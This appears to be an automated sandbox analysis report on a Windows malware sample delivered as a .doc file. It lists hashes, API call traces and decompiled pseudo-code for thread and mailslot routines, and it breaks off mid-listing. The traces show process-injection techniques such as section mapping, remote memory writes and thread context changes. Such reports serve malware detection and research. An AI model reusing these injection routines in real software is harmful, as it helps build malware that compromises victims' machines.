  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: apdsroxy.exe Analysis ID: 60981

General

Root Process Name:d3d8sext.exe
Process MD5:B6EECE7B4FD1B4BD2626AA07E17DA9DE
Total matches:193
Initial Analysis Report:Open
Initial sample Analysis ID:60981
Initial sample SHA 256:93E3B205BA5588173BA0C1C9E6CDD1BABA4EC461E498986DC9851FAC67FA9346
Initial sample name:Request_592655.doc

Similar Executed Functions

Function 01B3432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 96fc59e142f8f3589546cfe20ec42451b64ec7524ff1705d84ef22f3f4a31ef3
  • Instruction ID: 948e35715aeb2c22ee387c870a62c94da742bb75a7307fa5466974192b7d840c
  • Opcode Fuzzy Hash: 29219E03028ED390CA255D8305A2B932155DF81F53C6CE3F474BCB66855F51BE1A5789
  • Instruction Fuzzy Hash: 948e35715aeb2c22ee387c870a62c94da742bb75a7307fa5466974192b7d840c
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B343CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01B343E1
  • CloseHandle.KERNEL32(?), ref: 01B343F8
  • StrRChrA.SHLWAPI(01B311A6,00000000,0000005C), ref: 01B34404
  • lstrcat.KERNEL32(01B311A6,01B3825D), ref: 01B3443E
  • FindFirstFileA.KERNELBASE(01B311A6,?), ref: 01B34454
  • FindNextFileA.KERNELBASE(?,?), ref: 01B34486
  • StrChrA.SHLWAPI(?,0000002E), ref: 01B344F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 01B3452D
  • FindNextFileA.KERNELBASE(?,?), ref: 01B34542
  • CompareFileTime.KERNEL32(?,?), ref: 01B3456B
  • HeapFree.KERNEL32(00000000,00000000,01B38049), ref: 01B345A1
  • HeapFree.KERNEL32(00000000,01B311A6), ref: 01B345B1
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B31CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: 0e930324d983736687636c65484061bdc5c26c6a22796dc9d5b5e2d04a25d73d
  • Instruction ID: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
  • Opcode Fuzzy Hash: 7821C045058D4286DDE3B8960613F97E142FF43F88C9CFBA4B49A6669F0E04311AEB4F
  • Instruction Fuzzy Hash: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
APIs
    • Part of subcall function 01B3278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
    • Part of subcall function 01B3278F: memset.NTDLL ref: 01B3280F
    • Part of subcall function 01B3278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
    • Part of subcall function 01B3278F: NtClose.NTDLL(?), ref: 01B3283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31B66: GetModuleHandleA.KERNEL32(01B380DB,?,CCCCFEEB,01B31E8C,?,?,?,00000000), ref: 01B31B99
    • Part of subcall function 01B31B66: memcpy.NTDLL(?,3!?w,00000018,01B3845C,01B38400,01B38451), ref: 01B31C04
  • memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B339A5: memset.NTDLL ref: 01B339C4
    • Part of subcall function 01B31C13: memcpy.NTDLL(CCCCFEEB,01B37478,00000018,CCCCFEEB,01B3845C,CCCCFEEB,01B38400,CCCCFEEB,01B38451,CCCCFEEB,01B31E84,?,01B323F9,?,?,00000000), ref: 01B31CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
  • CloseHandle.KERNEL32(00000000), ref: 01B31EE0
  • memset.NTDLL ref: 01B31EF4
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
    • Part of subcall function 01B3284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328AE
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328C3
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 01B32905
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32E04, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 251 Total matches: 146registrystringmemory
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
